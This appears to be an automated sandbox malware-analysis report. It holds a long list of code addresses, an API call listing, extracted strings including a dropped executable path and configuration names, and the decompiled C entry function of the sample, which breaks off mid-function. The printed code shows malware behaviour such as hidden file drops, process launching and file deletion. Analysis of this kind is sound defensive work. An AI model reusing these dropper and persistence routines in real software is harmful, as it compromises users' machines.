                                                                                                                                  0x00000000
                                                                                                                                  0x0251d5c5
                                                                                                                                  0x0251d5ac
                                                                                                                                  0x0251d5ad
                                                                                                                                  0x0251d5b0
                                                                                                                                  0x0251d5b3
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d5b5
                                                                                                                                  0x0251d5c8
                                                                                                                                  0x0251d5c8
                                                                                                                                  0x0251d5cb
                                                                                                                                  0x0251d5cb
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d5d3
                                                                                                                                  0x0251cbdf
                                                                                                                                  0x0251cbe2
                                                                                                                                  0x0251ce26
                                                                                                                                  0x0251ce2c
                                                                                                                                  0x0251ce2e
                                                                                                                                  0x0251ce31
                                                                                                                                  0x0251ce34
                                                                                                                                  0x0251ce36
                                                                                                                                  0x0251cea0
                                                                                                                                  0x0251cea0
                                                                                                                                  0x0251cea8
                                                                                                                                  0x0251cea8
                                                                                                                                  0x0251ceaf
                                                                                                                                  0x0251ceb9
                                                                                                                                  0x0251cebf
                                                                                                                                  0x0251cec2
                                                                                                                                  0x0251d53e
                                                                                                                                  0x0251d53e
                                                                                                                                  0x0251d541
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251cec9
                                                                                                                                  0x0251cecc
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251ced2
                                                                                                                                  0x0251ced5
                                                                                                                                  0x0251d519
                                                                                                                                  0x0251d519
                                                                                                                                  0x0251d524
                                                                                                                                  0x0251d526
                                                                                                                                  0x0251d529
                                                                                                                                  0x0251d53b
                                                                                                                                  0x00000000
                                                                                                                                  0x0251cedb
                                                                                                                                  0x0251cee8
                                                                                                                                  0x0251ceed
                                                                                                                                  0x0251ceef
                                                                                                                                  0x0251cef2
                                                                                                                                  0x0251cef4
                                                                                                                                  0x0251cef9
                                                                                                                                  0x0251cefe
                                                                                                                                  0x0251cf00
                                                                                                                                  0x0251cf00
                                                                                                                                  0x0251cf02
                                                                                                                                  0x0251cf02
                                                                                                                                  0x0251cf04
                                                                                                                                  0x0251cf06
                                                                                                                                  0x0251cf0b
                                                                                                                                  0x0251cf0d
                                                                                                                                  0x0251cf12
                                                                                                                                  0x0251cf14
                                                                                                                                  0x0251cf1a
                                                                                                                                  0x0251cf20
                                                                                                                                  0x0251cf20
                                                                                                                                  0x0251cf1c
                                                                                                                                  0x0251cf1c
                                                                                                                                  0x0251cf1c
                                                                                                                                  0x0251cf25
                                                                                                                                  0x0251cf25
                                                                                                                                  0x0251cf27
                                                                                                                                  0x0251cf29
                                                                                                                                  0x0251cf2b
                                                                                                                                  0x0251cf81
                                                                                                                                  0x0251cf83
                                                                                                                                  0x0251cfdc
                                                                                                                                  0x0251cfe1
                                                                                                                                  0x0251d020
                                                                                                                                  0x0251d025
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d033
                                                                                                                                  0x0251d039
                                                                                                                                  0x0251d03f
                                                                                                                                  0x0251d042
                                                                                                                                  0x0251d042
                                                                                                                                  0x0251d044
                                                                                                                                  0x0251d045
                                                                                                                                  0x0251d045
                                                                                                                                  0x0251d049
                                                                                                                                  0x0251d04b
                                                                                                                                  0x0251d04d
                                                                                                                                  0x0251d04f
                                                                                                                                  0x0251d057
                                                                                                                                  0x0251d059
                                                                                                                                  0x0251d059
                                                                                                                                  0x0251d057
                                                                                                                                  0x0251d06d
                                                                                                                                  0x0251d073
                                                                                                                                  0x0251d07a
                                                                                                                                  0x0251d07a
                                                                                                                                  0x0251d07d
                                                                                                                                  0x0251d07d
                                                                                                                                  0x0251d07f
                                                                                                                                  0x0251d080
                                                                                                                                  0x0251d080
                                                                                                                                  0x0251d084
                                                                                                                                  0x0251d084
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d084
                                                                                                                                  0x0251cfef
                                                                                                                                  0x0251cff5
                                                                                                                                  0x0251cffb
                                                                                                                                  0x0251cffe
                                                                                                                                  0x0251cffe
                                                                                                                                  0x0251d000
                                                                                                                                  0x0251d001
                                                                                                                                  0x0251d001
                                                                                                                                  0x0251d005
                                                                                                                                  0x0251d005
                                                                                                                                  0x00000000
                                                                                                                                  0x0251cf85
                                                                                                                                  0x0251cfb1
                                                                                                                                  0x0251cfbe
                                                                                                                                  0x0251cfc3
                                                                                                                                  0x0251cfc9
                                                                                                                                  0x0251cfcc
                                                                                                                                  0x0251cfcc
                                                                                                                                  0x0251d007
                                                                                                                                  0x0251d007
                                                                                                                                  0x0251d009
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d00b
                                                                                                                                  0x00000000
                                                                                                                                  0x0251cfcf
                                                                                                                                  0x0251cfcf
                                                                                                                                  0x0251cfd1
                                                                                                                                  0x0251cfd2
                                                                                                                                  0x0251cfd4
                                                                                                                                  0x00000000
                                                                                                                                  0x0251cfd6
                                                                                                                                  0x0251cfd8
                                                                                                                                  0x00000000
                                                                                                                                  0x0251cfd8
                                                                                                                                  0x0251cfd4
                                                                                                                                  0x0251cf2d
                                                                                                                                  0x0251cf2d
                                                                                                                                  0x0251cf2d
                                                                                                                                  0x0251cf30
                                                                                                                                  0x0251cf32
                                                                                                                                  0x0251cf32
                                                                                                                                  0x0251cf32
                                                                                                                                  0x0251cf58
                                                                                                                                  0x0251cf58
                                                                                                                                  0x0251cf58
                                                                                                                                  0x0251cf5a
                                                                                                                                  0x0251cf5b
                                                                                                                                  0x0251cf5b
                                                                                                                                  0x0251cf61
                                                                                                                                  0x0251cf63
                                                                                                                                  0x0251cf65
                                                                                                                                  0x0251d086
                                                                                                                                  0x0251d086
                                                                                                                                  0x0251d089
                                                                                                                                  0x0251d0fe
                                                                                                                                  0x0251d0fe
                                                                                                                                  0x0251d104
                                                                                                                                  0x0251d104
                                                                                                                                  0x0251d105
                                                                                                                                  0x0251d10c
                                                                                                                                  0x0251d112
                                                                                                                                  0x0251d112
                                                                                                                                  0x0251d115
                                                                                                                                  0x0251d124
                                                                                                                                  0x0251d129
                                                                                                                                  0x0251d129
                                                                                                                                  0x0251d12c
                                                                                                                                  0x0251d130
                                                                                                                                  0x0251d13e
                                                                                                                                  0x0251d144
                                                                                                                                  0x0251d145
                                                                                                                                  0x0251d147
                                                                                                                                  0x0251d155
                                                                                                                                  0x0251d155
                                                                                                                                  0x0251d147
                                                                                                                                  0x0251d177
                                                                                                                                  0x0251d179
                                                                                                                                  0x0251d17c
                                                                                                                                  0x0251d33e
                                                                                                                                  0x0251d372
                                                                                                                                  0x0251d37f
                                                                                                                                  0x0251d384
                                                                                                                                  0x0251d38a
                                                                                                                                  0x0251d38d
                                                                                                                                  0x0251d390
                                                                                                                                  0x0251d390
                                                                                                                                  0x0251d392
                                                                                                                                  0x0251d393
                                                                                                                                  0x0251d393
                                                                                                                                  0x0251d397
                                                                                                                                  0x0251d399
                                                                                                                                  0x0251d39b
                                                                                                                                  0x0251d39d
                                                                                                                                  0x0251d3a5
                                                                                                                                  0x0251d3a7
                                                                                                                                  0x0251d3a7
                                                                                                                                  0x0251d3a5
                                                                                                                                  0x0251d3af
                                                                                                                                  0x0251d3bd
                                                                                                                                  0x0251d3c3
                                                                                                                                  0x0251d3c7
                                                                                                                                  0x0251d3d5
                                                                                                                                  0x0251d3db
                                                                                                                                  0x0251d3dc
                                                                                                                                  0x0251d3de
                                                                                                                                  0x0251d3ec
                                                                                                                                  0x0251d3ec
                                                                                                                                  0x0251d3de
                                                                                                                                  0x0251d40e
                                                                                                                                  0x0251d410
                                                                                                                                  0x0251d413
                                                                                                                                  0x0251d420
                                                                                                                                  0x0251d428
                                                                                                                                  0x0251d42f
                                                                                                                                  0x0251d435
                                                                                                                                  0x0251d439
                                                                                                                                  0x0251d447
                                                                                                                                  0x0251d44d
                                                                                                                                  0x0251d44e
                                                                                                                                  0x0251d450
                                                                                                                                  0x0251d45b
                                                                                                                                  0x0251d45b
                                                                                                                                  0x0251d450
                                                                                                                                  0x0251d461
                                                                                                                                  0x0251d461
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d182
                                                                                                                                  0x0251d18d
                                                                                                                                  0x0251d195
                                                                                                                                  0x0251d19c
                                                                                                                                  0x0251d1a2
                                                                                                                                  0x0251d1a6
                                                                                                                                  0x0251d1b4
                                                                                                                                  0x0251d1bb
                                                                                                                                  0x0251d1bd
                                                                                                                                  0x0251d1c8
                                                                                                                                  0x0251d1c8
                                                                                                                                  0x0251d1bd
                                                                                                                                  0x0251d1da
                                                                                                                                  0x0251d1e1
                                                                                                                                  0x0251d1e7
                                                                                                                                  0x0251d1e8
                                                                                                                                  0x0251d1ea
                                                                                                                                  0x0251d468
                                                                                                                                  0x0251d468
                                                                                                                                  0x0251d46b
                                                                                                                                  0x0251d47a
                                                                                                                                  0x0251d47f
                                                                                                                                  0x0251d47f
                                                                                                                                  0x0251d482
                                                                                                                                  0x0251d485
                                                                                                                                  0x0251d48b
                                                                                                                                  0x0251d48e
                                                                                                                                  0x0251d496
                                                                                                                                  0x0251d49b
                                                                                                                                  0x0251d4a2
                                                                                                                                  0x0251d4ac
                                                                                                                                  0x0251d4b1
                                                                                                                                  0x0251d4d8
                                                                                                                                  0x0251d4de
                                                                                                                                  0x0251d4e4
                                                                                                                                  0x0251d4e6
                                                                                                                                  0x0251d500
                                                                                                                                  0x0251d506
                                                                                                                                  0x0251d513
                                                                                                                                  0x0251d4e8
                                                                                                                                  0x0251d4f4
                                                                                                                                  0x0251d4fc
                                                                                                                                  0x0251d4fc
                                                                                                                                  0x0251d4e6
                                                                                                                                  0x0251d48e
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d1f0
                                                                                                                                  0x0251d1fd
                                                                                                                                  0x0251d231
                                                                                                                                  0x0251d23e
                                                                                                                                  0x0251d243
                                                                                                                                  0x0251d249
                                                                                                                                  0x0251d24c
                                                                                                                                  0x0251d24f
                                                                                                                                  0x0251d24f
                                                                                                                                  0x0251d251
                                                                                                                                  0x0251d252
                                                                                                                                  0x0251d252
                                                                                                                                  0x0251d256
                                                                                                                                  0x0251d258
                                                                                                                                  0x0251d25a
                                                                                                                                  0x0251d25c
                                                                                                                                  0x0251d264
                                                                                                                                  0x0251d266
                                                                                                                                  0x0251d266
                                                                                                                                  0x0251d264
                                                                                                                                  0x0251d26e
                                                                                                                                  0x0251d27c
                                                                                                                                  0x0251d282
                                                                                                                                  0x0251d286
                                                                                                                                  0x0251d294
                                                                                                                                  0x0251d29a
                                                                                                                                  0x0251d29b
                                                                                                                                  0x0251d29d
                                                                                                                                  0x0251d2ab
                                                                                                                                  0x0251d2ab
                                                                                                                                  0x0251d29d
                                                                                                                                  0x0251d2cd
                                                                                                                                  0x0251d2cf
                                                                                                                                  0x0251d2d2
                                                                                                                                  0x0251d2e3
                                                                                                                                  0x0251d2eb
                                                                                                                                  0x0251d2f2
                                                                                                                                  0x0251d2f8
                                                                                                                                  0x0251d2fc
                                                                                                                                  0x0251d30e
                                                                                                                                  0x0251d314
                                                                                                                                  0x0251d315
                                                                                                                                  0x0251d317
                                                                                                                                  0x0251d326
                                                                                                                                  0x0251d326
                                                                                                                                  0x0251d317
                                                                                                                                  0x0251d2fc
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d2d2
                                                                                                                                  0x0251d1ea
                                                                                                                                  0x0251d17c
                                                                                                                                  0x0251d08b
                                                                                                                                  0x0251d094
                                                                                                                                  0x0251d097
                                                                                                                                  0x0251d097
                                                                                                                                  0x0251d09a
                                                                                                                                  0x0251d09d
                                                                                                                                  0x0251d0bb
                                                                                                                                  0x0251d0bb
                                                                                                                                  0x0251d0c2
                                                                                                                                  0x0251d0c4
                                                                                                                                  0x0251d0c6
                                                                                                                                  0x0251d0f4
                                                                                                                                  0x0251d0f9
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d0f9
                                                                                                                                  0x0251d0c8
                                                                                                                                  0x0251d0ca
                                                                                                                                  0x0251d0d3
                                                                                                                                  0x0251d0d5
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d0d7
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d0d7
                                                                                                                                  0x0251d0cc
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d09f
                                                                                                                                  0x0251d09f
                                                                                                                                  0x0251d09f
                                                                                                                                  0x0251d0a8
                                                                                                                                  0x0251d0ab
                                                                                                                                  0x0251d0ae
                                                                                                                                  0x0251d0b5
                                                                                                                                  0x0251d0b6
                                                                                                                                  0x0251d0b6
                                                                                                                                  0x0251d0b6
                                                                                                                                  0x0251d0b6
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d09f
                                                                                                                                  0x0251cf6b
                                                                                                                                  0x0251cf72
                                                                                                                                  0x0251cf74
                                                                                                                                  0x0251cf7a
                                                                                                                                  0x0251d013
                                                                                                                                  0x0251d013
                                                                                                                                  0x0251d015
                                                                                                                                  0x0251d01d
                                                                                                                                  0x0251d01d
                                                                                                                                  0x0251d013
                                                                                                                                  0x00000000
                                                                                                                                  0x0251cf35
                                                                                                                                  0x0251cf35
                                                                                                                                  0x0251cf37
                                                                                                                                  0x0251cf38
                                                                                                                                  0x0251cf3a
                                                                                                                                  0x00000000
                                                                                                                                  0x0251cf3c
                                                                                                                                  0x0251cf3c
                                                                                                                                  0x0251cf47
                                                                                                                                  0x0251cf4c
                                                                                                                                  0x0251cf52
                                                                                                                                  0x0251cf55
                                                                                                                                  0x00000000
                                                                                                                                  0x0251cf55
                                                                                                                                  0x0251cf3a
                                                                                                                                  0x0251cf2b
                                                                                                                                  0x0251ced5
                                                                                                                                  0x0251d547
                                                                                                                                  0x0251d54e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d554
                                                                                                                                  0x0251d557
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d55d
                                                                                                                                  0x0251d563
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251d56c
                                                                                                                                  0x0251d577
                                                                                                                                  0x0251d57d
                                                                                                                                  0x0251d583
                                                                                                                                  0x0251ce38
                                                                                                                                  0x0251ce38
                                                                                                                                  0x0251ce38
                                                                                                                                  0x0251ce3b
                                                                                                                                  0x0251ce3f
                                                                                                                                  0x0251ce3f
                                                                                                                                  0x0251ce40
                                                                                                                                  0x0251ce89
                                                                                                                                  0x0251ce90
                                                                                                                                  0x0251ce42
                                                                                                                                  0x0251ce42
                                                                                                                                  0x0251ce42
                                                                                                                                  0x0251ce43
                                                                                                                                  0x0251ce76
                                                                                                                                  0x0251ce7d
                                                                                                                                  0x0251ce80
                                                                                                                                  0x0251ce45
                                                                                                                                  0x0251ce45
                                                                                                                                  0x0251ce46
                                                                                                                                  0x0251ce56
                                                                                                                                  0x0251ce5d
                                                                                                                                  0x0251ce60
                                                                                                                                  0x0251ce60
                                                                                                                                  0x0251ce46
                                                                                                                                  0x0251ce43
                                                                                                                                  0x0251ce98
                                                                                                                                  0x0251ce99
                                                                                                                                  0x0251ce9c
                                                                                                                                  0x0251ce9c
                                                                                                                                  0x00000000
                                                                                                                                  0x0251ce3b
                                                                                                                                  0x0251ce36
                                                                                                                                  0x0251cbe8
                                                                                                                                  0x0251cbeb
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251cbf1
                                                                                                                                  0x0251cbf5
                                                                                                                                  0x0251cdf2
                                                                                                                                  0x0251cdfa
                                                                                                                                  0x0251ce04
                                                                                                                                  0x0251ce09
                                                                                                                                  0x0251ce13
                                                                                                                                  0x0251ce16
                                                                                                                                  0x0251ce1b
                                                                                                                                  0x00000000
                                                                                                                                  0x0251ce1b
                                                                                                                                  0x0251cbfb
                                                                                                                                  0x0251cc00
                                                                                                                                  0x0251cc02
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251cc08
                                                                                                                                  0x0251cc0d
                                                                                                                                  0x0251cc10
                                                                                                                                  0x0251cc16
                                                                                                                                  0x0251cdd2
                                                                                                                                  0x0251cdd2
                                                                                                                                  0x0251cdd8
                                                                                                                                  0x0251cde2
                                                                                                                                  0x0251cde7
                                                                                                                                  0x00000000
                                                                                                                                  0x0251cc1c
                                                                                                                                  0x0251cc28
                                                                                                                                  0x0251cc35
                                                                                                                                  0x0251cc3a
                                                                                                                                  0x0251cc3b
                                                                                                                                  0x0251cc47
                                                                                                                                  0x0251cc4a
                                                                                                                                  0x0251cc64
                                                                                                                                  0x0251cc64
                                                                                                                                  0x0251cc66
                                                                                                                                  0x0251cc4c
                                                                                                                                  0x0251cc55
                                                                                                                                  0x0251cc58
                                                                                                                                  0x0251cc5b
                                                                                                                                  0x0251cc62
                                                                                                                                  0x0251cc63
                                                                                                                                  0x0251cc63
                                                                                                                                  0x00000000
                                                                                                                                  0x0251cc68
                                                                                                                                  0x0251cc8d
                                                                                                                                  0x0251cc9a
                                                                                                                                  0x0251cc9f
                                                                                                                                  0x0251ccb4
                                                                                                                                  0x0251ccba
                                                                                                                                  0x0251ccbd
                                                                                                                                  0x0251ccc0
                                                                                                                                  0x0251ccdc
                                                                                                                                  0x0251cce2
                                                                                                                                  0x0251cce5
                                                                                                                                  0x0251cce7
                                                                                                                                  0x0251cdcc
                                                                                                                                  0x0251cced
                                                                                                                                  0x0251cced
                                                                                                                                  0x0251ccf3
                                                                                                                                  0x0251ccfe
                                                                                                                                  0x0251cd21
                                                                                                                                  0x0251cd2a
                                                                                                                                  0x0251cd31
                                                                                                                                  0x0251cd3b
                                                                                                                                  0x0251cd47
                                                                                                                                  0x0251cd4d
                                                                                                                                  0x0251cd52
                                                                                                                                  0x0251cd55
                                                                                                                                  0x0251cd77
                                                                                                                                  0x0251cd7d
                                                                                                                                  0x0251cd7f
                                                                                                                                  0x0251cd89
                                                                                                                                  0x0251cd98
                                                                                                                                  0x0251cd9d
                                                                                                                                  0x0251cda5
                                                                                                                                  0x0251cda5
                                                                                                                                  0x0251cdaa
                                                                                                                                  0x0251cdac
                                                                                                                                  0x0251cdad
                                                                                                                                  0x0251cdb2
                                                                                                                                  0x0251cdb2
                                                                                                                                  0x0251cdb8
                                                                                                                                  0x0251cdc4
                                                                                                                                  0x0251cdc4
                                                                                                                                  0x0251cce7
                                                                                                                                  0x00000000
                                                                                                                                  0x0251ccc0
                                                                                                                                  0x0251cc66
                                                                                                                                  0x0251cc16
                                                                                                                                  0x0251dad2
                                                                                                                                  0x0251dad5
                                                                                                                                  0x0251dadb
                                                                                                                                  0x00000000
                                                                                                                                  0x0251cb60
                                                                                                                                  0x0251cb63
                                                                                                                                  0x00000000
                                                                                                                                  0x0251cb63
                                                                                                                                  0x0251cb5e
                                                                                                                                  0x0251ca4b
                                                                                                                                  0x0251ca4e
                                                                                                                                  0x0251ca4e
                                                                                                                                  0x00000000
                                                                                                                                  0x0251c9d2
                                                                                                                                  0x0251c9d2
                                                                                                                                  0x0251c9d8
                                                                                                                                  0x0251c9dd
                                                                                                                                  0x0251c9e0
                                                                                                                                  0x0251c9e1
                                                                                                                                  0x0251c9e3
                                                                                                                                  0x0251c9e9
                                                                                                                                  0x0251c9f1
                                                                                                                                  0x0251c9fb
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251c9fb
                                                                                                                                  0x00000000
                                                                                                                                  0x0251c9d8
                                                                                                                                  0x0251c9d0
                                                                                                                                  0x0251c9a5
                                                                                                                                  0x0251c9ab
                                                                                                                                  0x0251c9b2
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251c9b2
                                                                                                                                  0x0251c92f
                                                                                                                                  0x0251c935
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • closesocket.WS2_32(?), ref: 0251CA4E
                                                                                                                                  • closesocket.WS2_32(?), ref: 0251CB63
                                                                                                                                  • GetTempPathA.KERNEL32(00000120,?), ref: 0251CC28
                                                                                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0251CCB4
                                                                                                                                  • WriteFile.KERNEL32(0251A4B3,?,-000000E8,?,00000000), ref: 0251CCDC
                                                                                                                                  • CloseHandle.KERNEL32(0251A4B3), ref: 0251CCED
                                                                                                                                  • wsprintfA.USER32 ref: 0251CD21
                                                                                                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0251CD77
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,0000EA60), ref: 0251CD89
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0251CD98
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0251CD9D
                                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0251CDC4
                                                                                                                                  • CloseHandle.KERNEL32(0251A4B3), ref: 0251CDCC
                                                                                                                                  • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0251CFB1
                                                                                                                                  • GetSystemDirectoryA.KERNEL32 ref: 0251CFEF
                                                                                                                                  • GetSystemDirectoryA.KERNEL32 ref: 0251D033
                                                                                                                                  • lstrcatA.KERNEL32(?,04200108), ref: 0251D10C
                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 0251D155
                                                                                                                                  • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0251D171
                                                                                                                                  • WriteFile.KERNEL32(00000000,0420012C,?,?,00000000), ref: 0251D195
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0251D19C
                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000002), ref: 0251D1C8
                                                                                                                                  • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0251D231
                                                                                                                                  • lstrcatA.KERNEL32(?,04200108,?,?,?,?,?,?,?,00000100), ref: 0251D27C
                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,00000100), ref: 0251D2AB
                                                                                                                                  • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,00000100), ref: 0251D2C7
                                                                                                                                  • WriteFile.KERNEL32(00000000,0420012C,?,?,00000000,?,?,?,?,?,?,?,00000100), ref: 0251D2EB
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000100), ref: 0251D2F2
                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000002,?,?,?,?,?,?,?,00000100), ref: 0251D326
                                                                                                                                  • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0251D372
                                                                                                                                  • lstrcatA.KERNEL32(?,04200108,?,?,?,?,?,?,?,00000100), ref: 0251D3BD
                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,00000100), ref: 0251D3EC
                                                                                                                                  • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,00000100), ref: 0251D408
                                                                                                                                  • WriteFile.KERNEL32(00000000,0420012C,?,?,00000000,?,?,?,?,?,?,?,00000100), ref: 0251D428
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000100), ref: 0251D42F
                                                                                                                                  • SetFileAttributesA.KERNEL32(?,00000002,?,?,?,?,?,?,?,00000100), ref: 0251D45B
                                                                                                                                  • CreateProcessA.KERNEL32(?,02520264,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0251D4DE
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0251D4F4
                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0251D4FC
                                                                                                                                  • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0251D513
                                                                                                                                  • closesocket.WS2_32(?), ref: 0251D56C
                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0251D577
                                                                                                                                  • ExitProcess.KERNEL32 ref: 0251D583
                                                                                                                                  • wsprintfA.USER32 ref: 0251D81F
                                                                                                                                    • Part of subcall function 0251C65C: send.WS2_32(00000000,?,00000000), ref: 0251C74B
                                                                                                                                  • closesocket.WS2_32(?), ref: 0251DAD5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseHandle$AttributesCreate$Writeclosesocket$EnvironmentProcessVariablelstrcat$DeleteDirectorySystemwsprintf$ExitObjectPathSingleSleepTempWaitsend
                                                                                                                                  • String ID: .dat$.sys$4$@$C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe$\$\$drivers\$except_info$flags_upd$lid_file_upd$local_time$localcfg$srv_time$time_cfg$work_srv$wtm_c$wtm_r$wtm_w
                                                                                                                                  • API String ID: 562065436-2967255785
                                                                                                                                  • Opcode ID: b5ed5fb410d02a62f8623589400c479bc27c930e8764a6525bcb8a0a4a870fe8
                                                                                                                                  • Instruction ID: 8fc921c6a8772b7db2b80318f4432ff1a94ac105cfbb212b200c262fe8360243
                                                                                                                                  • Opcode Fuzzy Hash: b5ed5fb410d02a62f8623589400c479bc27c930e8764a6525bcb8a0a4a870fe8
                                                                                                                                  • Instruction Fuzzy Hash: 88B2D072D81219ABFB20DFA4CC85EEA7BBDFB49304F05046AE905E21C0E7319959CF59
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 02519A6B Relevance: 102.3, APIs: 48, Strings: 10, Instructions: 799stringsleepregistryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                  			_entry_(CHAR* _a12, void* _a15) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				char _v28;
				char _v32;
				union _GET_FILEEX_INFO_LEVELS _v36;
				CHAR* _v40;
				char _v44;
				char _v48;
				struct _PROCESS_INFORMATION _v64;
				char _v80;
				char _v112;
				char _v371;
				char _v372;
				char _v671;
				char _v672;
				char _v704;
				struct _STARTUPINFOA _v772;
				char _v1271;
				char _v1272;
				char _v1672;
				char _t238;
				long _t239;
				char _t242;
				long _t244;
				CHAR* _t248;
				char _t250;
				intOrPtr _t257;
				char _t267;
				intOrPtr* _t272;
				char _t276;
				char _t279;
				char _t282;
				char _t283;
				void* _t284;
				char _t294;
				CHAR* _t303;
				int _t304;
				char _t309;
				CHAR* _t312;
				char _t318;
				int _t324;
				CHAR* _t325;
				char _t328;
				char* _t331;
				char _t332;
				char _t340;
				char _t344;
				CHAR* _t357;
				CHAR* _t358;
				int _t359;
				int _t373;
				long _t379;
				void* _t383;
				void* _t396;
				void* _t401;
				char _t402;
				char _t403;
				intOrPtr* _t410;
				void* _t411;
				char _t417;
				char _t418;
				void* _t424;
				intOrPtr _t426;
				void* _t428;
				char* _t436;
				intOrPtr _t441;
				CHAR* _t442;
				void* _t450;
				void* _t451;
				char _t459;
				void* _t464;
				void* _t465;
				void* _t467;
				void* _t468;
				void* _t469;
				void* _t470;
				void* _t471;
				void* _t474;
				intOrPtr _t475;

				SetErrorMode(3); // executed
				SetErrorMode(3); // executed
				SetUnhandledExceptionFilter(E02516511); // executed
				E0251EC54(); // executed
				_t475 =  *0x252201f; // 0x1
				if(_t475 != 0) {
					__eflags =  *0x25233d8; // 0x0
					if(__eflags == 0) {
						L126:
						CreateThread(0, 0, E0251405E, 0, 0, 0); // executed
						__imp__#115(0x1010,  &_v1672); // executed
						E0251E52E(_t449, __eflags);
						E0251EAAF(1, 0);
						E02511D96(_t438, 0x2522118);
						E025180C9(_t438); // executed
						CreateThread(0, 0, E0251877E, 0, 0, 0); // executed
						E02515E6C(__eflags);
						E02513132();
						E0251C125(__eflags);
						E02518DB1(_t438);
						Sleep(0xbb8); // executed
						E0251C4EE();
						while(1) {
							__eflags =  *0x25233d0; // 0x0
							if(__eflags == 0) {
								goto L129;
							}
							_t239 = GetTickCount();
							__eflags = _t239 -  *0x25233d0 - 0x109a0;
							if(_t239 -  *0x25233d0 < 0x109a0) {
								L131:
								Sleep(0x1a90); // executed
								continue;
							}
							L129:
							_t238 = E0251C913(); // executed
							__eflags = _t238;
							if(_t238 == 0) {
								 *0x25233d0 = GetTickCount();
							}
							goto L131;
						}
					}
					_a12 = 0xa;
					while(1) {
						_t242 = DeleteFileA(0x25233d8); // executed
						__eflags = _t242;
						if(_t242 != 0) {
							break;
						}
						__eflags = _a12;
						if(_a12 <= 0) {
							break;
						}
						_t244 = GetLastError();
						__eflags = _t244 - 2;
						if(_t244 == 2) {
							break;
						}
						_t219 =  &_a12;
						 *_t219 = _a12 - 1;
						__eflags =  *_t219;
						Sleep(0x3e8);
					}
					E0251EE2A(_t438, 0x25233d8, 0, 0x104);
					_t465 = _t465 + 0xc;
					goto L126;
				} else {
					_v12 = 0;
					if(GetModuleFileNameA(GetModuleHandleA(0),  &_v672, 0x12c) == 0) {
						_v672 = 0;
					}
					if(_v672 == 0x22) {
						E0251EF00( &_v672,  &_v671);
						_t436 = E0251ED23( &_v672, 0x22);
						_t465 = _t465 + 0x10;
